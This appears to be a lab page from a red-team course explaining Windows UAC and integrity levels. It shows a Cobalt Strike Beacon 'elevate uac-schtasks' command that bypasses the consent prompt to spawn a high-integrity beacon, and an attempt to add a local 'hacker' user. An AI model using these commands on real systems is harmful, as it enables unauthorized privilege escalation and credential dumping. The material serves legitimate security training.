UAC Bypasses
User Account Control (UAC) is a technology that exists in Windows which forces applications to prompt for consent when requesting an administrative access token. Bob is a local administrator on Workstation 2 - but if we open a Command Prompt and attempt to add a new local user, we get an access denied. This instance of cmd.exe is running in "medium integrity".
C:\Users\bfarmer>net user hacker Passw0rd! /add
System error 5 has occurred.
Access is denied.
C:\Users\bfarmer>whoami /groups
Mandatory Label\Medium Mandatory Level
\
Instead, what we must do is right-click and select "Run as administrator", which will cause a UAC prompt to appear.
\

\
Only after clicking Yes will the Command Prompt have sufficient privileges to make system configuration changes, as it will now be running in "high integrity".
C:\Windows\system32>whoami /groups
Mandatory Label\High Mandatory Level
\
A UAC "bypass" is a technique that allows a medium integrity process to elevate itself or spawn a new process in high integrity, without prompting the user for consent. Being in high integrity is important for attackers because it's required for various post-exploitation actions such as dumping credentials.
Beacon has a few built-in UAC bypasses and a few more which are provided via the Elevate Kit (this has already been pre-loaded into Cobalt Strike for your convenience). These are exposed via the elevate
command.
\
beacon> elevate uac-schtasks tcp-local
[*] Tasked Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444) in a high integrity context
[+] established link to child beacon: 10.10.123.102
\

Last updated